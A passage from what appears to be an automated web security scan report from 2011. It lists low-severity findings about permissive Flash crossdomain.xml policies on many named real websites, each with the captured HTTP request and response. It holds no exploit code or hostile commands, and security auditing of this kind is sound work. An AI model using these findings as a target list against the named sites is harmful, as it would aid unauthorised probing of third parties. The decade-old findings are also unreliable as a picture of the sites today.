   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.185. http://www.gadsdentimes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gadsdentimes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gadsdentimes.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 Oct 2010 18:51:12 GMT
Content-Length: 1027
Accept-Ranges: bytes
ETag: "cea8dac23e75cb1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 10:22:15 GMT
X-Cache: HIT from nysquid01
X-Cache-Lookup: HIT from nysquid01:80
Via: 1.0 nysquid01 (squid/3.0.STABLE18)
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.starnewsonline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gainesville.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gainesvillesun.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sunone.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ocala.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starbanner.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.publicus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.us.publicus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.publicus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.pressdemocrat.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false" />
...[SNIP]...

7.186. http://www.giftcards.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.giftcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.giftcards.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:32 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 15:14:35 GMT
ETag: "108f04-5dd-492810d18acc0"
Accept-Ranges: bytes
Content-Length: 1501
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="www.omnip
...[SNIP]...
<allow-access-from domain="www.omniprepaid.com" />
...[SNIP]...
<allow-access-from domain="*.omniprepaid.com" />
...[SNIP]...
<allow-access-from domain="*.giftcards.com" />
...[SNIP]...
<allow-access-from domain="*.busycode.jp" />
...[SNIP]...
<allow-access-from domain="*.dev.giftcardscorp.com" />
...[SNIP]...
<allow-access-from domain="*.wrl.com" />
...[SNIP]...
<allow-access-from domain="*.giftcardscorp.com" />
...[SNIP]...
<allow-access-from domain="*.giftcardsqa.com" />
...[SNIP]...
<allow-access-from domain="*.omniprepaidqa.com" />
...[SNIP]...
<allow-access-from domain="*.mycoupons.com" />
...[SNIP]...

7.187. http://www.hepsiburada.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hepsiburada.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hepsiburada.com

Response

HTTP/1.1 200 OK
Xet-Cookie:
Date: Tue, 03 May 2011 11:15:41 GMT
Connection: Keep-Alive
Via: HB
ETag: "6206d82fbdcb1:0"
Content-Type: text/xml
Last-Modified: Wed, 26 Jan 2011 08:05:49 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 326

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.hepsiburada.com" />
<allow-access-from domain="*.hepsiburada.net" />
<allow-access-from domain="design.hepsiburada.net" />
...[SNIP]...
<allow-access-from domain="*.donanimhaber.com" />
<allow-access-from domain="*.yilmazyavuz.com" />
...[SNIP]...

7.188. http://www.hgvclub.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hgvclub.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hgvclub.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:05 GMT
Server: Apache
Last-Modified: Wed, 02 Jul 2008 18:24:48 GMT
ETag: "228ecf-1ae-9b8ddc00"
Accept-Ranges: bytes
Content-Length: 430
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.hgvclub.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hgvc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ownhilton.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hiltongrandvacations.com" secure="false"/>
...[SNIP]...

7.189. http://www.homeawayrealestate.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.homeawayrealestate.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homeawayrealestate.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "Hjfxn5kn3/6"
Last-Modified: Tue, 31 Aug 2010 15:52:14 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 364
Date: Tue, 03 May 2011 10:29:17 GMT
Set-Cookie: NSC_IBSF_Qfstjtufodf_Hspvq=ffffffffaf141c9b45525d5f4f58455e445a4a4229a0;path=/;httponly

<?xml version="1.0"?>
<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.homeawayrealestate.com" to-ports="*" />

...[SNIP]...

7.190. http://www.jaguar.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.jaguar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jaguar.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"239-1294838382000"
Last-Modified: Wed, 12 Jan 2011 13:19:42 GMT
Content-Type: application/xml;charset=utf-8
Content-Length: 239
Cache-Control: max-age=12486
Expires: Tue, 03 May 2011 13:48:29 GMT
Date: Tue, 03 May 2011 10:20:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.jaguar.com" secure="false" to-ports="*"/>
...[SNIP]...

7.191. http://www.jameshardie.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.jameshardie.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jameshardie.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:04 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e DAV/2 PHP/5.2.17 mod_jk/1.2.26 SVN/1.4.4
Last-Modified: Thu, 29 Apr 2010 19:05:01 GMT
ETag: "6a0411-88-48564cdb11140"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*.jameshardie.com"/>
<allow-access-from domain="*.hardie.com"/>
</cross-domain-policy>

7.192. http://www.kerpoof.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.kerpoof.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kerpoof.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:23:38 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Fri, 01 Apr 2011 15:50:55 GMT
Accept-Ranges: bytes
Content-Length: 177
Cache-Control: max-age=315360000
Expires: Fri, 30 Apr 2021 11:23:38 GMT
Content-Type: application/xml
X-Cache: MISS from kpwork5
X-Cache-Lookup: MISS from kpwork5:80
Via: 1.1 kpwork5:80 (squid/2.7.STABLE6)
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.kerpoof.us"/>
<allow-access-from domain="*.kerpoof.com"/>
<allow-access-from domain="*.apictura.com"/>
</cross-domain-policy>

7.193. http://www.kidk.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.kidk.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kidk.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:50 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Last-Modified: Fri, 10 Oct 2008 15:08:24 GMT
ETag: "7000009d-5d9-48ef6fe8"
Accept-Ranges: bytes
Content-Length: 1497
Connection: close
Content-Type: application/xml

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="abc.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="dynamic.abc.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="dynamic.myabcdev.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="static.abc.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="static.myabcdev.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ll.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ll.abc.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ll.media.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ll.media.abc.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ll.static.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ll.static.abc.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="a.static.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="a.static.abc.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="a.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="media.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...

7.194. http://www.kjct8.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.kjct8.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kjct8.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
X-IBS-CCDS-VERSION: 2.16.16
X-IBS-CCDS-ORIGIN: origin126
Accept-Ranges: bytes
Content-Length: 131
Content-Type: text/xml
Cache-Control: max-age=84004
Expires: Wed, 04 May 2011 10:23:14 GMT
Date: Tue, 03 May 2011 11:03:10 GMT
Connection: close
Set-Cookie: alpha=3dce8f18440b0000eee0bf4d051903008c800200; expires=Fri, 30-Apr-2021 11:03:10 GMT; path=/; domain=.kjct8.com

<?xml version="1.0" encoding="utf-8" ?>
   <cross-domain-policy>
       <allow-access-from domain="*.kjct8.com"/>
   </cross-domain-policy>

7.195. http://www.kxlh.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.kxlh.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kxlh.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Location: http://www1.kxlh.com/crossdomain.xml
Content-Type: text/xml
Date: Tue, 03 May 2011 11:32:12 GMT
ETag: "e29228a25d73ca1:2e8b"
Last-Modified: Wed, 02 Dec 2009 14:42:12 GMT
Server: ECAcc (dca/53CF)
Vary: Accept-Encoding
X-Cache: HIT
X-Powered-By: ASP.NET
Content-Length: 260
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.krtv.com" />
<allow-access-from domain="*.kxlh.com" />
...[SNIP]...

7.196. http://www.lacoste.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lacoste.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lacoste.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:06 GMT
Content-Length: 1320
Content-Type: application/xml
ETag: "120006-528-6f34bd80"
Last-Modified: Thu, 24 Feb 2011 10:11:18 GMT
Accept-Ranges: bytes
Server: Apache
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.lacoste.com" />
<allow-access-from domain="*.lacoste.co.kr" />
<allow-access-from domain="*.lacoste.co.jp" />
<allow-access-from domain="*.lacoste.com.cn" />
<allow-access-from domain="*.lacoste.cn" />
<allow-access-from domain="*.lacoste.com.au" />

<allow-access-from domain="indianapolis.nexen.net" />
<allow-access-from domain="indianapolis2.nexen.net" />

<allow-access-from domain="*.lacostecrocmyths.com" />
<allow-access-from domain="*.lacostered.jp" />
<allow-access-from domain="*.lacostered.co.kr" />
<allow-access-from domain="*.lacostered.cn" />

<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="test2.4mation.com.au" />
...[SNIP]...
<allow-access-from domain="jeux.actiplay.com" />
<allow-access-from domain="ftpdownload.macromedia.com" />

<allow-access-from domain="*.lacostelive.jp" />
<allow-access-from domain="*.lacoste-live.cn" />
<allow-access-from domain="*.lacostelive.co.kr" />
<allow-access-from domain="*.asiance-dev.com" />
...[SNIP]...

7.197. http://www.lasalle.edu/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lasalle.edu
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lasalle.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 13:45:30 GMT
ETag: "120338-178-4a0b8e7c95280"
Accept-Ranges: bytes
Content-Length: 376
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="digitalcommons.lasalle.edu" />
...[SNIP]...

7.198. http://www.launchfire.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.launchfire.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.launchfire.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:11 GMT
Server: Apache
Last-Modified: Tue, 07 Oct 2008 17:00:46 GMT
ETag: "1e33fd-14a-458acbda26b80"
Accept-Ranges: bytes
Content-Length: 330
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="www.fromlabs.com" />
   <allow-access-from domain="*.fromlabs.com" />
   <allow-access-from domain="fromlabs.com" />
   <allow-access-from domain="popcardz.com" />
   <allow-access-from domain="*.popcardz.com" />
   <allow-access-from domain="www.popcardz.com" />
...[SNIP]...

7.199. http://www.lespac.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lespac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lespac.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:53 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 14:59:25 GMT
ETag: "478515-e7-3d15cd40"
Accept-Ranges: bytes
Content-Length: 231
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...

7.200. http://www.marca.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marca.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marca.com

Response

HTTP/1.1 200 OK
Server: Apache
Date: Tue, 03 May 2011 10:47:04 GMT
Content-Type: text/xml
Content-Length: 1171
Last-Modified: Thu, 24 Mar 2011 12:31:53 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.elmundo.es" />
<allow-access-from domain="*.el-mundo.net" />
<allow-access-from domain="*.elmundo.int" />
<allow-access-from domain="*.agilbanner.com" />
<allow-access-from domain="*.marca.com" />
<allow-access-from domain="*.tiramillas.net" />
<allow-access-from domain="*.marcamotor.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="217.116.2.35" />
<allow-access-from domain="*.telva.com" />
<allow-access-from domain="*.latiendademarca.com" />
<allow-access-from domain="*.expansion.com" />
<allow-access-from domain="*.recoletos.es" />
<allow-access-from domain="*.quetejuegasque.com" />
<allow-access-from domain="212.36.73.171" />
<allow-access-from domain="*.madrid-open.com" />
<allow-access-from domain="*.unibet.com" />
<allow-access-from domain="www.campusvirtualceu.com" />
<allow-access-from domain="*.gazzetta.it" />
<allow-access-from domain="*.gazzettaobjects.it" />
...[SNIP]...

7.201. http://www.mikesbikes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mikesbikes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mikesbikes.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 27 Mar 2007 21:29:31 GMT
Accept-Ranges: bytes
ETag: "8e3df41b770c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:08:25 GMT
Connection: close
Content-Length: 122

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.sellingcycling.com" />
</cross-domain-policy>

7.202. http://www.minglehouse.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.minglehouse.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.minglehouse.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:21 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.8
Last-Modified: Sun, 26 Apr 2009 12:09:14 GMT
ETag: "100000000efce-147-468741924eaec"
Accept-Ranges: bytes
Content-Length: 327
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="apps.facebook.com" />
   <allow-access-from domain="apps.*.facebook.com" />

   <allow-access-from domain="*.facebook.com" />
...[SNIP]...

7.203. http://www.monica.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.monica.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.monica.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:42 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 13 Oct 2010 15:49:28 GMT
ETag: "38589d-297-4928189d95200"
Accept-Ranges: bytes
Content-Length: 663
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sonymusic.com" />
<allow-access-from domain="sonymusic.com" />
<allow-access-from domain="*.columbiarecords.com" />
<allow-access-from domain="columbiarecords.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.google-analytics.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="windows.dev.boffswana.com.au" />
<allow-access-from domain="*.britneyvideogame.com" />
...[SNIP]...

7.204. http://www.mtv.ca/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mtv.ca
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.ca

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Wed, 02 Dec 2009 20:09:42 GMT
ETag: "41edf30-343-479c47480ed80"
Accept-Ranges: bytes
Content-Length: 835
Content-Type: application/xml
Cache-Control: max-age=600
Date: Tue, 03 May 2011 10:22:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.mtv.com" />
   <allow-access-from domain="*.mtvi.com" />
   <allow-access-from domain="*.schematic.com" />
   <allow-access-from domain="*.mtv.ca" />
   <allow-access-from domain="*.mtvhive.ca" />
   <allow-access-from domain="*.datemyplaylist.ca" />
   <allow-access-from domain="*.datemyplaylist.com" />
   <allow-access-from domain="166.77.9.69" />
   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="m1.2mdn.net" />
   <allow-access-from domain="*.coorslight.ca" />
<allow-access-from domain="*.muchmtv.ca" />
   <allow-access-from domain="*.muchmusic.com" />
   <allow-access-from domain="*.2mdn.net" />
...[SNIP]...

7.205. http://www.nin.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nin.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nin.com

Response

HTTP/1.0 200 OK
Date: Thu, 30 Dec 2010 08:35:03 GMT
Server: Apache
Last-Modified: Fri, 12 Mar 2010 16:56:40 GMT
ETag: "488c006-19e-6a4b2200"
Accept-Ranges: bytes
Content-Length: 414
Content-Type: text/xml
Age: 156875
X-Cache: HIT from ninweb5.sudjam.com
X-Cache-Lookup: HIT from ninweb5.sudjam.com:80
Via: 1.0 ninweb5.sudjam.com:80 (squid/2.6.STABLE22)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/
...[SNIP]...
<allow-access-from domain="*.nin.com" to-ports="80,6667" />
...[SNIP]...
<allow-access-from domain="*.sudjam.com" to-ports="80,6667" />
...[SNIP]...
<allow-access-from domain="*.nokia.com" to-ports="80" />
...[SNIP]...

7.206. http://www.northerntrust.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.northerntrust.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.northerntrust.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:14:36 GMT
Last-Modified: Fri, 11 Sep 2009 17:57:47 GMT
ETag: "b750bc-1b9-dbedcc0"
Accept-Ranges: bytes
Content-Length: 441
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd
...[SNIP]...
<allow-access-from domain="*.ntrs.com" />
   <allow-access-from domain="ntrs.com" />
   <allow-access-from domain="*.northerntrust.com" />
   <allow-access-from domain="northerntrust.com" />
...[SNIP]...

7.207. http://www.nu.nl/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nu.nl
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nu.nl

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Last-Modified: Wed, 28 Apr 2010 22:48:30 GMT
Cache-Control: max-age=60
Expires: Tue, 03 May 2011 10:37:24 GMT
Content-Type: text/xml; charset=utf-8
P3P: policyref="http://www.nu.nl/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMa DEVa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV INT STA"
Content-Length: 215
Date: Tue, 03 May 2011 10:36:24 GMT
X-Varnish: 179633387
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Hits: 0
X-Id: ilsia223
Via: 1.1 ilsia260.gsa

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ilsemedia.nl" />
</cross
...[SNIP]...

7.208. http://www.o.biz/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.o.biz
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.o.biz

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:39 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT
Accept-Ranges: bytes
Content-Length: 230
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy
X-Pad: avoid browser bug

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-content-type"/>
<allow-access-from domain="*.overstock.com"/>
<allow-access-from domain="*.ostkcdn.com"/>
...[SNIP]...

7.209. http://www.oregonlotteryloyalty.org/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.oregonlotteryloyalty.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oregonlotteryloyalty.org

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 08 Nov 2010 01:05:31 GMT
Accept-Ranges: bytes
ETag: "df7b2eae17ecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:39:43 GMT
Connection: close
Content-Length: 398

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.eyeblasterwiz.com" />
<allow-access-from domain="*.serving-sys.com" />
<allow-access-from domain="*.whatsinsantasbeard.com" />
<allow-access-from domain="*.oregonlotteryloyalty.org" />
...[SNIP]...

7.210. http://www.our-hometown.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.our-hometown.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.our-hometown.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:23 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 15:28:11 GMT
ETag: "1300000017dd54-7f-48d65aa12bbc7"
Accept-Ranges: bytes
Content-Length: 127
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.mytiwi.com" to-ports="*" />
</cross-domain-policy>

7.211. http://www.palacenet.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.palacenet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.palacenet.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 344
Content-Type: text/xml
Last-Modified: Fri, 19 Feb 2010 20:01:09 GMT
Accept-Ranges: bytes
ETag: "6c449b479eb1ca1:5b3"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:01:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.palacenet.com" />
   <allow-access-from domain="*.nba.com" />
   <allow-access-from domain="*.pistons.com" />
   <allow-access-from domain="localhost" />
...[SNIP]...

7.212. http://www.playtech.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.playtech.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playtech.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 20 Aug 2008 08:06:51 GMT
ETag: "7431-6cb-454dfafd11cc0"
Accept-Ranges: bytes
Content-Length: 1739
Connection: close
Content-Type: application/xml
Vary: Accept-Encoding

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="www.stanleyslots.com" />
<allow-access-from domain="www.stanleyslots.co.uk" />
<allow-access-from domain="www.stanleysslots.com" />
<allow-access-from domain="www.stanleysslots.co.uk" />
